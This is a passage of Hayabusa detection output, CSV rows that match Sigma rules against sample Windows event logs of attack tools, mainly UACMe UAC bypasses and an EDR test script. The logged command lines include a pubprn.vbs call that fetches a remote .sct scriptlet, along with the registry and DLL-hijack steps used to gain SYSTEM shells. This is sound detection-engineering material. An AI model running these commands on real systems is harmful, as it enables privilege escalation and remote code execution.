SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Calculator Usage,,rules/sigma/process_creation/proc_creation_win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:41.793 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Tasks\mysc | Process: C:\Windows\system32\svchost.exe | PID: 1028 | PGUID: 747F3D96-DCFE-5D3F-0000-001044D20000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:45.242 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4184 | PGUID: 747F3D96-6675-5D3F-0000-0010AA498F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:45.311 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: 
C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6192 | PGUID: 747F3D96-6675-5D3F-0000-0010774E8F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | LID: 0x413182 | PID: 4036 | PGUID: 747F3D96-6675-5D3F-0000-0010875C8F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 34 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool 
UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:48.726 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - UAC bypass UACME-34 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\explorer.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:48.924 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: ""C:\Windows\System32\schtasks.exe"" /run /tn ""\Microsoft\Windows\DiskCleanup\SilentCleanup"" /i | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 34 | LID: 0x18d3fb | PID: 1268 | PGUID: 747F3D96-5808-5D45-0000-0010D1FE3E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe""\system32\cleanmgr.exe /autoclean /d C: | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x18d3b3 | PID: 1380 | PGUID: 
747F3D96-5809-5D45-0000-00100B233F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Disk Cleanup,,rules/sigma/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:49.436 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,PrivEsc - UAC bypass UACME-34 | DeleteValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir | Process: C:\Windows\explorer.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:49.502 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 33 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious 
Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command\DelegateExecute: (Empty) | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,rules/sigma/registry_event/win_re_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command\(Default): C:\Windows\system32\cmd.exe | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:07.652 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\fodhelper.exe"" | Process: C:\Windows\System32\fodhelper.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 33 | LID: 0x18d3fb | PID: 4208 | PGUID: 747F3D96-5E6F-5D45-0000-00108F969D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:07.665 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 324 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4060 | PGUID: 747F3D96-5E6F-5D45-0000-00103B989D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.065 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\fodhelper.exe"" | Process: C:\Windows\System32\fodhelper.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 33 | LID: 0x18d3b3 | PID: 8180 | PGUID: 747F3D96-5E6F-5D45-0000-001014CA9D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\fodhelper.exe"" | LID: 0x18d3b3 | PID: 3656 | PGUID: 747F3D96-5E70-5D45-0000-0010FCDD9D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,high,PrivEsc,Bypass UAC via Fodhelper.exe,,rules/sigma/process_creation/proc_creation_win_uac_fodhelper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.681 
+09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | DeleteKey: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.799 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 32 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 6380 | PGUID: 747F3D96-6742-5D45-0000-00104A66B500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.647 
+09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 32 | Path: C:\Users\IEUser\AppData\Local\Temp\OskSupport.dll | Process: C:\Windows\explorer.exe | PID: 6380 | PGUID: 747F3D96-6742-5D45-0000-00104A66B500,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,high,Evas | PrivEsc,UAC Bypass Using Windows Media Player - File,,rules/sigma/file_event/file_event_uac_bypass_wmp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.685 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 8160 | PGUID: 747F3D96-6742-5D45-0000-00102A72B500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:47.219 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064425400 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 324 | PGUID: 747F3D96-6743-5D45-0000-0010DAA8B500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:48.431 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\windows\system32\cmd.exe ""C:\Program Files\Windows Media Player\osk.exe"" | Process: C:\Windows\System32\cmd.exe | User: 
MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3fb | PID: 6456 | PGUID: 747F3D96-6743-5D45-0000-001068D7B500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:48.675 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3fb | PID: 5840 | PGUID: 747F3D96-6744-5D45-0000-00108BE4B500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:48.696 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064425400 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5124 | PGUID: 747F3D96-6744-5D45-0000-00102FE6B500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:49.371 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3b3 | PID: 5524 | PGUID: 747F3D96-6744-5D45-0000-0010040CB600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 30 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7984 | PGUID: 747F3D96-6EA3-5D45-0000-0010204DE100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:15.364 
+09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:15.560 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 30 | Path: C:\Users\IEUser\AppData\Local\Temp\wow64log.dll | Process: C:\Windows\explorer.exe | PID: 7984 | PGUID: 747F3D96-6EA3-5D45-0000-0010204DE100,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:15.560 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:15.579 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064427C00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3640 | PGUID: 747F3D96-6EA3-5D45-0000-0010FB58E100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:17.433 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\wusa.exe"" | Process: C:\Windows\SysWOW64\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 30 | LID: 0x18d3fb | PID: 3340 | PGUID: 747F3D96-6EA4-5D45-0000-0010DD92E100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 
20:23:17.541 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 294 0000028064427C00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6292 | PGUID: 747F3D96-6EA5-5D45-0000-0010E19FE100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.619 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\wusa.exe"" | Process: C:\Windows\SysWOW64\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 30 | LID: 0x18d3b3 | PID: 6312 | PGUID: 747F3D96-6EA5-5D45-0000-0010C5C4E100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.666 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 30 | Image: C:\Windows\System32\wow64log.dll | Process: C:\Windows\SysWOW64\WerFault.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 932 | PGUID: 747F3D96-6EA5-5D45-0000-00107AC9E100 | Hash: SHA1=F26AD3298954CE6C5D01DC0ACC2B4A516554B430,MD5=7B97BFB44F4B8163AC336B0C85F62763,SHA256=5B08DFA2FA7CC474632485F1EC66CDCC0EEC9560C3630C1A8588EE345153209D,IMPHASH=3432208F552ABE01A0293828CD0796BE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.694 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312 | LID: 0x3e7 | PID: 6068 | PGUID: 747F3D96-6EA5-5D45-0000-001032CCE100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx 
+2019-08-03 20:23:18.715 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 80 | Process: C:\Windows\SysWOW64\WerFault.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\syswow64\wusa.exe"" | LID: 0x18d3b3 | PID: 4348 | PGUID: 747F3D96-6EA5-5D45-0000-00107CCEE100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.803 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 30 | Image: C:\Windows\System32\wow64log.dll | Process: C:\Windows\SysWOW64\WerFault.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4768 | PGUID: 747F3D96-6EA5-5D45-0000-0010EED0E100 | Hash: SHA1=F26AD3298954CE6C5D01DC0ACC2B4A516554B430,MD5=7B97BFB44F4B8163AC336B0C85F62763,SHA256=5B08DFA2FA7CC474632485F1EC66CDCC0EEC9560C3630C1A8588EE345153209D,IMPHASH=3432208F552ABE01A0293828CD0796BE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.824 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348 | LID: 0x3e7 | PID: 7844 | PGUID: 747F3D96-6EA5-5D45-0000-00108FD3E100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 23 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5080 | PGUID: 747F3D96-78DD-5D45-0000-0010B8A50301",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
